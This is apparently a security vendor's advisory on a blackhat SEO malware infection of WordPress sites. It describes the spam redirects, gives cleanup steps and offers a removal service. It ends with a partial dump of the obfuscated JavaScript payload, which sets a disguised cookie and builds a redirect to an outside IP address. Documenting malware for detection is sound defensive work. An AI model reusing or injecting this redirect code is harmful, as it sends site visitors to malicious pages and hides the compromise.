Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
This is a malware that redirects site visitors to SEO SPAM campaigns. It's commonly injecting links to fake products and pharma spam shop pages. It's obfuscated to prevent easy detection and in this particular case, the malware redirects to malicious IP addresses which then provide random redirects to other malicious sites.
Affecting
Vulnerable WordPress installations
Cleanup
Cleanup is done by deleting the malicious code from the file, or replacing it with a fresh version. The infection can be found in your system by searching for the malicious string inside your files.
You can also sign up with us and let our team remove the malware for you.
Dump
<script type="text/javascript">var _0xd7b4=["","ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789","random","length","floor","charAt","getTime","setTime","cookie","=",";expires=","toGMTString","; path=","indexOf","substring",";","cookieEnabled","__cfsuid","1","/","href","location","http","://","134.","249.","116.","78/?key="];function id(){var _0x94d3x2=_0xd7b4[0];var _0x94d3x3=_0xd7b4[1];for(var _0x94d3x4=0;_0x94d3x4< 32;_0x94d3x4++){_0x94d3x2+= _0x94d3x3[_0xd7b4[5]](Math[_0xd7b4[4]](Math[_0xd7b4[2]]()* _0x94d3x3[_0xd7b4[3]]))};return _0x94d3x2}function _mmm_(_0x94d3x6,_0x94d3x7,_0x94d3x8,_0x94d3x9){var _0x94d3xa= new Date();var _0x94d3xb= new Date();if(_0x94d3x8=== null|| _0x94d3x8=== 0){_0x94d3x8= 3};_0x